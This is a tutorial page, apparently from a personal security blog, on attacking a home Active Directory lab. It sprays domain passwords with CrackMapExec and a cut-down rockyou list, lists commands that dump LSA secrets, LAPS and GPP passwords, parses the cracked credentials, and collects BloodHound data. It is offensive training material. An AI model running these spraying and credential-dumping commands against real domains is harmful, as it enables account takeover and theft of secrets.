# Active Directory Lab Setup \[ AD Enumeration ] - 103

## <mark style="color:orange;">`BRUTEFORCING DOMAIN PASSWORDS`</mark>

For bruteforcing domain passwords we need our own Kali Linux box.

Install Kali Linux on VMware by following a YouTube video or one of the written guides; my suggestion:

{% embed url="<https://www.stationx.net/how-to-install-kali-linux-on-vmware/>" %}

Let's start bruteforcing :thumbsup:

We need a list of users to bruteforce. Let's copy all the users from DC01 to our Kali box.

> Kali TIPS: I have my own [kali repository in my github](https://github.com/akuma-log/My-Kali), so you can build a zsh shell very fast and set up your tmux very nicely. I always use tmux. I love tmux 😘
>
> Pre-installations: Sublime Text

After copying the usernames from DC01, put them in a file on Kali.

Every username in the pasted list is separated by runs of spaces. To remove the spaces and put each username on its own line with Vim:

* **Open the file in Vim:**

  ```bash
  vim filename.txt
  ```
* **Enter Normal Mode:** Press `Esc` to ensure you are in Normal mode.
* **Remove spaces and put each word on a new line:** You can use the following Vim command in Normal mode:

  ```vim
  :%s/ \+/\r/g
  ```

After this, the runs of spaces are gone and each username sits on its own line. If the pasted text started or ended with spaces you will get an empty line at the top or bottom; delete it before saving, otherwise the tools below will try an empty username.

Then remove the `Administrator`, `Guest` and `krbtgt` accounts from the list. We only want normal user accounts for now.
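The same clean-up as a shell function, so it can be rerun on fresh exports. This is an added example, not from the original page: the sample dump is constructed to look like a paste from DC01, and the account names other than the three built-ins are assumptions. Unlike the Vim substitution alone, it also drops the blank lines that leading spaces produce and de-duplicates names.

```shell
#!/usr/bin/env bash
# Added example (not from the page): turn a space-separated username dump into
# one name per line, dropping the built-in accounts we don't want to spray.

# Constructed sample, mimicking a copy-paste from DC01 (names are assumptions).
SAMPLE_DUMP='   Administrator   Guest   krbtgt   abutler    jdoe
  msmith   abutler   '

normalize_users() {
  # stdin:  whitespace-separated names (any mix of spaces, tabs, newlines)
  # stdout: one unique name per line, built-ins removed
  tr -s '[:space:]' '\n' \
    | sed '/^$/d' \
    | grep -v -i -x -E 'Administrator|Guest|krbtgt' \
    | sort -u
}

# Usage: paste the dump into users.raw, then
#   normalize_users < users.raw > user.txt
printf '%s' "$SAMPLE_DUMP" | normalize_users
```

`grep -x` matches whole lines, so a legitimate user called `guestbook` would survive the filter; `-i` catches `krbtgt` regardless of how the export capitalised it.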

### <mark style="color:purple;">`Customize Rockyou.txt`</mark>

Let's first unzip `rockyou.txt.gz` in `/usr/share/wordlists`:

```
└─ ⚔ gunzip /usr/share/wordlists/rockyou.txt.gz

└─ ⚔ wc -l /usr/share/wordlists/rockyou.txt
 14344392 /usr/share/wordlists/rockyou.txt

└─ ⚔ head -n 1000 /usr/share/wordlists/rockyou.txt > passwords.txt
```

`rockyou.txt` is huge: `wc -l` shows it has about 14 million lines. So I just took the first 1000 passwords with `head`. Even 1000 passwords against every user is a lot of failed logons, so keep the domain's lockout threshold in mind (we check it with `--pass-pol` below).

Let's confirm we can reach DC01 with ping (we can):

<figure><img src="/files/qQz5z1TchRs3MeDq5uyV" alt=""><figcaption></figcaption></figure>

### <mark style="color:purple;">`Enumeration`</mark>

<figure><img src="/files/lxHufcwszMFgUUNI4vdF" alt=""><figcaption><p>nmap scan</p></figcaption></figure>

The nmap scan shows the ports a Windows domain controller typically exposes: 53 (DNS), 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389/636 (LDAP/LDAPS), 464 (kpasswd), 593 (RPC over HTTP), 3268/3269 (Global Catalog) and often 5985 (WinRM). Try to remember these; this port pattern is how you recognise a DC in a scan.

Next, log in with a user on WS01, note its IP address and run an nmap scan against it:

<figure><img src="/files/0vdvVCNpRNc2poKLKyB9" alt=""><figcaption></figcaption></figure>

nmap shows no SMB on the workstation. Let's use other tools for this enumeration; using multiple tools is good practice, since no single one sees everything.

### <mark style="color:purple;">Let's use CrackMapExec</mark>

```
> crackmapexec smb 10.10.0.100
SMB         10.10.0.100     445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:xyz.com) (signing:True) (SMBv1:False)
```

DC01 answers on SMB. Let's first try with deliberately fake credentials.

<figure><img src="/files/P7tZoJAw8ite4vzwnMiv" alt=""><figcaption></figcaption></figure>

STATUS\_LOGON\_FAILURE means the credentials are not valid on DC01. Now let's point CrackMapExec at our lists:

```
└─ ⚔ crackmapexec smb targets.txt -u user.txt -p passwords.txt 
```

This tries every user in `user.txt` against every password in `passwords.txt` and reports the first valid pair it finds. Mind the lockout policy: because every combination is attempted, use fewer passwords per round than the lockout threshold and wait out the observation window between rounds.

<figure><img src="/files/c1QXS57pUG80nzrYgZmg" alt=""><figcaption></figcaption></figure>

If you run it again you will get the same user every time, because CrackMapExec stops at the first valid hit per target by default. To keep going and find the other users' passwords, add `--continue-on-success` and filter for the `[+]` lines:

```
└─ ⚔ crackmapexec smb targets.txt -u user.txt -p passwords.txt --continue-on-success | grep '[+]'
```

It will take some time, so `sit back, relax and ENJOY 😁`

We can do a lot more with CrackMapExec. For enumeration:

### <mark style="color:purple;">`CrackMapExec Enumeration Keywords and Commands`</mark>

All of these need a valid domain account (the pair we just sprayed is enough for most of them). CrackMapExec itself is no longer maintained; its fork NetExec (`nxc`) keeps the same syntax, so the commands below work unchanged with `nxc`.

1. **Enumerate Users**

   ```sh
   crackmapexec smb <target> -u <username> -p <password> --users
   ```
2. **Enumerate Groups**

   ```sh
   crackmapexec smb <target> -u <username> -p <password> --groups
   ```
3. **Enumerate Shares**

   ```sh
   crackmapexec smb <target> -u <username> -p <password> --shares
   ```
4. **Enumerate Sessions**

   ```sh
   crackmapexec smb <target> -u <username> -p <password> --sessions
   ```
5. **Enumerate Logged On Users**

   ```sh
   crackmapexec smb <target> -u <username> -p <password> --loggedon-users
   ```
6. **Domain Info**: there is no separate flag; the banner line CrackMapExec prints on every connection (OS build, hostname, domain, SMB signing, SMBv1) already carries it, with or without credentials:

   ```sh
   crackmapexec smb <target>
   ```
7. **Enumerate Password Policy** (check the lockout threshold and observation window *before* spraying):

   ```sh
   crackmapexec smb <target> -u <username> -p <password> --pass-pol
   ```
8. **Authenticate with the LAPS password**: reads the LAPS-managed local Administrator password over LDAP with your domain credentials and uses it against the target:

   ```sh
   crackmapexec smb <target> -u <username> -p <password> --laps
   ```
9. **Enumerate Users and Groups over LDAP** (same data as 1 and 2, but via LDAP instead of SAMR, which is useful when SMB to the DC is filtered):

   ```sh
   crackmapexec ldap <target> -u <username> -p <password> --users --groups
   ```
10. **Enumerate Domain Controllers**

    ```sh
    crackmapexec ldap <target> -u <username> -p <password> --dc-list
    ```
11. **Enumerate Accounts Trusted for (Unconstrained) Delegation**

    ```sh
    crackmapexec ldap <target> -u <username> -p <password> --trusted-for-delegation
    ```
12. **Dump LSA Secrets**: this is what `--lsa` does; it needs local admin on the target and is post-exploitation, not ACL enumeration. ACLs are BloodHound's job, covered below.

    ```sh
    crackmapexec smb <target> -u <username> -p <password> --lsa
    ```
13. **Group Policy Preferences Passwords**: the classic GPO credential leak; the module searches SYSVOL for `cpassword` entries and decrypts them:

    ```sh
    crackmapexec smb <target> -u <username> -p <password> -M gpp_password
    ```
14. **Enumerate Domain Computers**: CrackMapExec has no dedicated flag for this. The computer objects come out of the BloodHound.py collection in the next section, or query LDAP for `(objectClass=computer)` with a tool such as `ldapsearch`.

## <mark style="color:orange;">`BLOODHOUND Domain Enumeration`</mark>

Another great tool for enumerating AD is BloodHound. There is no real alternative to BloodHound 😁

Let's download BloodHound:

{% embed url="<https://github.com/BloodHoundAD/BloodHound>" %}

BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory or Azure environment.

BloodHound has its own [documentation](https://bloodhound.readthedocs.io/en/latest/index.html). (Feel free to read it.)

Let's [download BloodHound](https://bloodhound.readthedocs.io/en/latest/installation/linux.html) following their docs. (These are the docs for the legacy Electron BloodHound; its successor, BloodHound CE, is installed differently.)

<figure><img src="/files/P0I1QoZFNaaZZloQ6sGX" alt=""><figcaption><p>running Bloodhound</p></figcaption></figure>

I set up BloodHound in my `/opt` directory.

### <mark style="color:purple;">`Set up a password for neo4j:`</mark>

When we open BloodHound it asks for the neo4j credentials. neo4j ships with the default `neo4j:neo4j`, and on first login it forces us to set a new password.

<figure><img src="/files/Bs11ZD9TL4HlH4H9Vbra" alt=""><figcaption><p>requesting for password setup</p></figcaption></figure>

Visit `localhost:7474` (the neo4j browser), log in with the default `neo4j:neo4j`, and a prompt to set a new password opens. Set it there, then use the new password in BloodHound.

<mark style="color:red;">`Reset the neo4j credentials`</mark>

If you forget the password you can reset it:

```
> locate neo4j | grep auth
/usr/share/neo4j/data/dbms/auth

# Stop neo4j, delete that file and start neo4j again; it will ask you to
# change the default credentials once more.
```

<figure><img src="/files/0HMUQqwGlVZTe7GEkZvV" alt=""><figcaption></figcaption></figure>

Once we are in BloodHound it asks for data, so we need to collect some.

In the password bruteforcing section we got some SMB credential hits, right?

I just copied everything into `creds.txt`. Let's extract the credentials:

* **Open the file in Vim:**

  ```sh
  vim creds.txt
  ```
* **Enter Normal Mode:** Press `Esc` to ensure you are in Normal mode.
* **Run the substitution command:** Use the following command to transform each line:

  ```vim
  :%s/.*\\\([^\\:]*\):\([^\\:]*\)/\1:\2/
  ```

By following these steps each line goes from the format `"SMB 10.10.0.100 445 DC1 [+] xyz.com\abutler:softball"` to the `username:password` form, e.g. `abutler:softball`. The substitution assumes the password contains neither `:` nor `\`, and it leaves the ` (Pwn3d!)` marker that CrackMapExec appends when the account is a local admin glued onto the password, so check the result before feeding it to other tools.
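The same extraction, covering both the `--continue-on-success` spraying output from the bruteforcing section and this Vim step, as an added shell example that is not part of the original page. The function pulls every `[+]` hit out of saved CrackMapExec output and handles the cases the one-liner does not: the ` (Pwn3d!)` marker, passwords containing `:` or `\`, and failed logins mixed in. The log lines are constructed to match the page's own output format; the extra accounts and passwords are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the page): extract user:password pairs from saved
# crackmapexec smb output. Only "[+]" lines are valid logins.

# Constructed sample, formatted like crackmapexec's smb module output
# (the fakeuser/jdoe/msmith lines and their passwords are assumptions).
CME_LOG='SMB         10.10.0.100     445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:xyz.com) (signing:True) (SMBv1:False)
SMB         10.10.0.100     445    DC1              [-] xyz.com\fakeuser:fakepass STATUS_LOGON_FAILURE
SMB         10.10.0.100     445    DC1              [+] xyz.com\abutler:softball
SMB         10.10.0.100     445    DC1              [+] xyz.com\jdoe:Pa:ss\word1 (Pwn3d!)
SMB         10.10.0.100     445    DC1              [-] xyz.com\msmith:123456 STATUS_LOGON_FAILURE'

extract_creds() {
  # stdin:  crackmapexec output; stdout: user:password for every [+] line.
  # 1. keep only the text after "[+] " (failed and info lines are dropped)
  # 2. strip the DOMAIN\ prefix up to the FIRST backslash, so a backslash
  #    inside the password survives
  # 3. strip a trailing " (Pwn3d!)" admin marker and any trailing spaces;
  #    everything after the first ':' is the password, colons included
  sed -n -E 's/^.*\[[+]\] +//p' \
    | sed -E 's/^[^\\]*\\//; s/ *[(]Pwn3d![)] *$//; s/ +$//'
}

# Usage with a real spray:
#   crackmapexec smb targets.txt -u user.txt -p passwords.txt \
#       --continue-on-success | tee spray.log
#   extract_creds < spray.log > creds.txt
printf '%s\n' "$CME_LOG" | extract_creds
```

Splitting on the first backslash and first colon is what makes this safe: the domain never contains a backslash and the username never contains a colon, whereas the password may contain either.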

<figure><img src="/files/gFU4CDxE0FiukwnHCIxz" alt=""><figcaption></figcaption></figure>

Now that we have credentials, we need to collect data to upload into the BloodHound GUI.

BloodHound has a Python collector, BloodHound.py:

{% embed url="<https://github.com/dirkjanm/BloodHound.py>" %}

We can install it with `pip install bloodhound`.

A couple of changes first. Add `10.10.0.100 dc1.xyz.com` to `/etc/hosts`,

and point the resolver at the DC by setting `nameserver 10.10.0.100` in `/etc/resolv.conf` (alternatively, leave that file alone and pass `-ns 10.10.0.100` to bloodhound-python, which is less intrusive).

Let's run bloodhound-python:

<figure><img src="/files/1PeUnYnIEyOjifWHlzxC" alt=""><figcaption></figcaption></figure>

* **`bloodhound-python`**: the collector.
* **`-u abutler`**: username to authenticate with.
* **`-p softball`**: that user's password.
* **`-dc dc1.xyz.com`**: domain controller to query.
* **`--disable-autogc`**: don't auto-select a Global Catalog server; use it only if collection fails with GC errors (it has nothing to do with garbage collection).
* **`-d xyz.com`**: the AD domain.
* Not in the screenshot but worth knowing: `-c All` collects everything, including ACLs (the default collection method only gathers groups, local admins, sessions and trusts), and `--zip` bundles the output into one archive.

Running `ls` shows the JSON files the collector wrote, one per object type. Those are what we import into BloodHound (drag them onto the window or use the Upload Data button).

<figure><img src="/files/M7GhAvSr7o0NCdPXctNJ" alt=""><figcaption></figcaption></figure>
